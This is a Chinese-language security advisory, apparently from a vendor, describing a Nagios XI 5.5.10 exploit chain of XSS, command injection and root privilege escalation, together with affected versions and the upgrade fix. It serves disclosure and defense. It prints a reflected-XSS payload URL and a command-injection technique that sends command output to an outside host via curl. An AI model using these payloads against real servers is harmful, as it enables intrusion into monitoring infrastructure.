1.1事件概要
Nagios XI是一款易于使用,完整的IT基础架构监控应用程序,能够监控企业的关键服务器,网络设备,服务和应用程序,并在出现问题时通知企业管理员。
Nagios XI能够通过使用内置功能和第三方扩展和插件来监控数百种不同类型的应用程序、服务、协议和计算机硬件。远程攻击者可以欺骗管理员或者授权用户(具有创建“自动发现作业”权限的用户)访问包含跨站脚本(XSS)的恶意URL(CVE-2019-9167),管理员或者授权用户将会在NagiosXI Server上进行代码执注入从而导致远程执行代码(RCE)(CVE-2019-9164)和本地获取远程root shell特权升级(LPE)(CVE-2019-9166)。
通过以上3个漏洞的组合利用,攻击者可以以远程的方式获取NagiosXIServer的root权限。
网藤CRS/ARS产品已全面支持该漏洞的检测与验证,网藤用户可直接登陆www.riskivy.com 进行验证。
1.2复现过程
下载虚拟机版本NagiosXI 5.5.10
https://assets.nagios.com/downloads/nagiosxi/5/ovf/nagiosxi-5.5.10-64.ova
下载安装版 NagiosXI 5.5.10
https://assets.nagios.com/downloads/nagiosxi/5/xi-5.5.10.tar.gz#_ga=
2.36817056.1469818844.1555034877-701644701.1555034877
使用安装目录下面的 fullinstall即可安装
安装完后访问http://127.0.0.1/nagiosxi/
此处存在反射型XSS(CVE-2019-9167),诱骗管理员访问以下链接
http://127.0.0.1/nagiosxi/about/index.php?xiwindow=a:javascript:(alert(1))//
后台某接口存在命令注入(CVE-2019-9164),攻击者构造如下请求包, 即可进行远程代码执行
&符号解析存在一定问题,可以使用curl http://ip/`whoami`的方式进行代码注入。
此处还存在权限提升漏洞,不做具体细节披露,如需了解详情,可联系斗象安全应急响应团队。
高危
NagiosXI < 5.5.11
升级 NagiosXI 到5.5.11版本
https://www.shielder.it/blog/nagios-xi-5-5-10-xss-to-root-rce/
https://www.nagios.com/products/security/
https://nvd.nist.gov/vuln/detail/CVE-2019-9167
https://nvd.nist.gov/vuln/detail/CVE-2019-9164
https://nvd.nist.gov/vuln/detail/CVE-2019-9166
以上是本次高危漏洞预警的相关信息,如有任何疑问或需要更多支持,可通过以下方式与我们取得联系。
联系电话:400-156-9866
Email:help@tophant.com